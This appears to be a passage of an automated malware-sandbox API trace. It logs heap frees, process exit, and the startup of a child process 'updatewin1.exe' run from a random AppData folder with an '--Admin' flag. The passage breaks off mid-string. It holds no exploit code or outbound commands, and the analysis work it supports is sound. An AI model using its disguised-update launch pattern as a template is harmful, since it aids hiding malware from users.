1 [0129.819] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1960 | out: hHeap=0x5c0000) returned 1 [0129.819] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1988 | out: hHeap=0x5c0000) returned 1 [0129.819] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f19b0 | out: hHeap=0x5c0000) returned 1 [0129.819] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f19d8 | out: hHeap=0x5c0000) returned 1 [0129.819] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1a00 | out: hHeap=0x5c0000) returned 1 [0129.819] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1a28 | out: hHeap=0x5c0000) returned 1 [0129.819] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1a50 | out: hHeap=0x5c0000) returned 1 [0129.819] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1a78 | out: hHeap=0x5c0000) returned 1 [0129.819] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1aa0 | out: hHeap=0x5c0000) returned 1 [0129.819] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1ac8 | out: hHeap=0x5c0000) returned 1 [0129.819] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1af0 | out: hHeap=0x5c0000) returned 1 [0129.819] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1b18 | out: hHeap=0x5c0000) returned 1 [0129.819] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1b40 | out: hHeap=0x5c0000) returned 1 [0129.819] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1b68 | out: hHeap=0x5c0000) returned 1 [0129.819] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1b90 | out: hHeap=0x5c0000) returned 1 [0129.819] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1bb8 | out: hHeap=0x5c0000) returned 1 [0129.819] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1be0 | out: hHeap=0x5c0000) returned 1 [0129.819] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1c08 | out: hHeap=0x5c0000) returned 1 [0129.819] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1c30 | out: hHeap=0x5c0000) returned 1 [0129.819] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1c58 | out: hHeap=0x5c0000) returned 1 [0129.819] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1c80 | out: hHeap=0x5c0000) returned 1 [0129.820] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1ca8 | out: hHeap=0x5c0000) returned 1 [0129.820] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1cd0 | out: hHeap=0x5c0000) returned 1 [0129.820] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1cf8 | out: hHeap=0x5c0000) returned 1 [0129.820] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1d20 | out: hHeap=0x5c0000) returned 1 [0129.820] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1d48 | out: hHeap=0x5c0000) returned 1 [0129.820] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1d70 | out: hHeap=0x5c0000) returned 1 [0129.820] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1d98 | out: hHeap=0x5c0000) returned 1 [0129.820] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1dc0 | out: hHeap=0x5c0000) returned 1 [0129.820] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1e18 | out: hHeap=0x5c0000) returned 1 [0129.820] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1e40 | out: hHeap=0x5c0000) returned 1 [0129.820] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1e68 | out: hHeap=0x5c0000) returned 1 [0129.820] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1e90 | out: hHeap=0x5c0000) returned 1 [0129.820] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1eb8 | out: hHeap=0x5c0000) returned 1 [0129.820] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1ee0 | out: hHeap=0x5c0000) returned 1 [0129.820] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1f08 | out: hHeap=0x5c0000) returned 1 [0129.820] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1f30 | out: hHeap=0x5c0000) returned 1 [0129.820] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1f58 | out: hHeap=0x5c0000) returned 1 [0129.820] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1f80 | out: hHeap=0x5c0000) returned 1 [0129.820] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1fa8 | out: hHeap=0x5c0000) returned 1 [0129.820] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1fd0 | out: hHeap=0x5c0000) returned 1 [0129.820] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1ff8 | out: hHeap=0x5c0000) returned 1 [0129.820] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2020 | out: hHeap=0x5c0000) returned 1 [0129.820] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2048 | out: hHeap=0x5c0000) returned 1 [0129.820] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2070 | out: hHeap=0x5c0000) returned 1 [0129.820] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2098 | out: hHeap=0x5c0000) returned 1 [0129.820] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f20c0 | out: hHeap=0x5c0000) returned 1 [0129.820] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f20e8 | out: hHeap=0x5c0000) returned 1 [0129.820] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5d5490 | out: hHeap=0x5c0000) returned 1 [0129.820] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2110 | out: hHeap=0x5c0000) returned 1 [0129.820] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2138 | out: hHeap=0x5c0000) returned 1 [0129.820] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2160 | out: hHeap=0x5c0000) returned 1 [0129.820] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2188 | out: hHeap=0x5c0000) returned 1 [0129.820] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f21b0 | out: hHeap=0x5c0000) returned 1 [0129.820] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f21d8 | out: hHeap=0x5c0000) returned 1 [0129.820] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2200 | out: hHeap=0x5c0000) returned 1 [0129.820] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2228 | out: hHeap=0x5c0000) returned 1 [0129.820] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2250 | out: hHeap=0x5c0000) returned 1 [0129.821] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2278 | out: hHeap=0x5c0000) returned 1 [0129.821] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f22a0 | out: hHeap=0x5c0000) returned 1 [0129.821] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f22c8 | out: hHeap=0x5c0000) returned 1 [0129.821] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f22f0 | out: hHeap=0x5c0000) returned 1 [0129.821] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2318 | out: hHeap=0x5c0000) returned 1 [0129.821] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2340 | out: hHeap=0x5c0000) returned 1 [0129.821] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2368 | out: hHeap=0x5c0000) returned 1 [0129.821] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2390 | out: hHeap=0x5c0000) returned 1 [0129.821] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f23b8 | out: hHeap=0x5c0000) returned 1 [0129.821] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f23e0 | out: hHeap=0x5c0000) returned 1 [0129.821] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2408 | out: hHeap=0x5c0000) returned 1 [0129.821] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2430 | out: hHeap=0x5c0000) returned 1 [0129.821] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2458 | out: hHeap=0x5c0000) returned 1 [0129.821] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2480 | out: hHeap=0x5c0000) returned 1 [0129.821] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f24a8 | out: hHeap=0x5c0000) returned 1 [0129.821] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f24d0 | out: hHeap=0x5c0000) returned 1 [0129.821] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f24f8 | out: hHeap=0x5c0000) returned 1 [0129.821] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2520 | out: hHeap=0x5c0000) returned 1 [0129.821] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2548 | out: hHeap=0x5c0000) returned 1 [0129.821] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2570 | out: hHeap=0x5c0000) returned 1 [0129.821] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2598 | out: hHeap=0x5c0000) returned 1 [0129.821] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f25c0 | out: hHeap=0x5c0000) returned 1 [0129.821] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2618 | out: hHeap=0x5c0000) returned 1 [0129.821] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2640 | out: hHeap=0x5c0000) returned 1 [0129.821] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2668 | out: hHeap=0x5c0000) returned 1 [0129.821] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2690 | out: hHeap=0x5c0000) returned 1 [0129.821] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f26b8 | out: hHeap=0x5c0000) returned 1 [0129.821] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f26e0 | out: hHeap=0x5c0000) returned 1 [0129.821] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2708 | out: hHeap=0x5c0000) returned 1 [0129.821] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2730 | out: hHeap=0x5c0000) returned 1 [0129.821] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2758 | out: hHeap=0x5c0000) returned 1 [0129.821] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2780 | out: hHeap=0x5c0000) returned 1 [0129.821] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f27a8 | out: hHeap=0x5c0000) returned 1 [0129.821] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f27d0 | out: hHeap=0x5c0000) returned 1 [0129.821] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f27f8 | out: hHeap=0x5c0000) returned 1 [0129.821] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2820 | out: hHeap=0x5c0000) returned 1 [0129.821] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2848 | out: hHeap=0x5c0000) returned 1 [0129.821] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2870 | out: hHeap=0x5c0000) returned 1 [0129.821] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2898 | out: hHeap=0x5c0000) returned 1 [0129.822] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f28c0 | out: hHeap=0x5c0000) returned 1 [0129.822] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f28e8 | out: hHeap=0x5c0000) returned 1 [0129.822] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2910 | out: hHeap=0x5c0000) returned 1 [0129.822] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2938 | out: hHeap=0x5c0000) returned 1 [0129.822] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2960 | out: hHeap=0x5c0000) returned 1 [0129.822] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2988 | out: hHeap=0x5c0000) returned 1 [0129.822] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f29b0 | out: hHeap=0x5c0000) returned 1 [0129.822] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f29d8 | out: hHeap=0x5c0000) returned 1 [0129.822] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2a00 | out: hHeap=0x5c0000) returned 1 [0129.822] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2a28 | out: hHeap=0x5c0000) returned 1 [0129.822] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2a50 | out: hHeap=0x5c0000) returned 1 [0129.822] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2a78 | out: hHeap=0x5c0000) returned 1 [0129.822] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2aa0 | out: hHeap=0x5c0000) returned 1 [0129.822] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f4e00 | out: hHeap=0x5c0000) returned 1 [0129.822] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5eeaf8 | out: hHeap=0x5c0000) returned 1 [0129.822] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0129.822] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0129.822] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5ea3e8 | out: hHeap=0x5c0000) returned 1 [0129.822] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5ecdc8 | out: hHeap=0x5c0000) returned 1 [0129.823] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-2", hFile=0x0, dwFlags=0x800) returned 0x0 [0129.823] GetLastError () returned 0x57 [0129.823] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18f584 | out: phModule=0x18f584) returned 0 [0129.823] ExitProcess (uExitCode=0x0) [0129.823] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5ead00 | out: hHeap=0x5c0000) returned 1 [0129.823] TerminateProcess (hProcess=0xffffffff, uExitCode=0x0) Process: id = "9" image_name = "updatewin1.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin1.exe" page_root = "0x3d0dd000" os_pid = "0xbf4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x5b0" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin1.exe\" --Admin" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 95 os_tid = 0x568 [0130.596] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0xc3360450, dwHighDateTime=0x1d62438)) [0130.596] GetCurrentProcessId () returned 0xbf4 [0130.596] GetCurrentThreadId () returned 0x568 [0130.596] GetTickCount () returned 0x1154d56 [0130.596] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=25099220035) returned 1 [0130.605] GetStartupInfoA (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0130.605] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x320000 [0130.608] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0130.608] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0130.608] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0130.608] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0130.608] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0130.608] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0130.608] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0130.609] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0130.609] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0130.609] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0130.609] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0130.609] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0130.609] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0130.609] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0130.609] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0130.610] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0130.610] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0130.610] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0130.610] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0130.611] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0130.611] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0130.611] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x214) returned 0x3207d0 [0130.611] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0130.611] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0130.611] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0130.611] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0130.611] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0130.612] GetCurrentThreadId () returned 0x568 [0130.612] GetStartupInfoA (in: lpStartupInfo=0x18fea4 | out: lpStartupInfo=0x18fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0130.612] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x8, Size=0x800) returned 0x3209f0 [0130.612] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0130.612] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0130.612] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0130.612] SetHandleCount (uNumber=0x20) returned 0x20 [0130.612] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin1.exe\" --Admin" [0130.612] GetEnvironmentStringsW () returned 0x634e78* [0130.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0130.613] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x565) returned 0x3211f8 [0130.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x3211f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0130.613] FreeEnvironmentStringsW (penv=0x634e78) returned 1 [0130.613] GetLastError () returned 0x0 [0130.613] SetLastError (dwErrCode=0x0) [0130.613] GetLastError () returned 0x0 [0130.613] SetLastError (dwErrCode=0x0) [0130.613] GetLastError () returned 0x0 [0130.613] SetLastError (dwErrCode=0x0) [0130.613] GetACP () returned 0x4e4 [0130.613] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x220) returned 0x321768 [0130.613] GetLastError () returned 0x0 [0130.613] SetLastError (dwErrCode=0x0) [0130.613] IsValidCodePage (CodePage=0x4e4) returned 1 [0130.613] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0130.613] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0130.613] GetLastError () returned 0x0 [0130.613] SetLastError (dwErrCode=0x0) [0130.613] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0130.613] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0130.614] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0130.614] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0130.614] GetLastError () returned 0x0 [0130.614] SetLastError (dwErrCode=0x0) [0130.614] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0130.614] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0130.614] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ毊ᕋ㞕AĀ") returned 256 [0130.614] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ毊ᕋ㞕AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0130.614] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 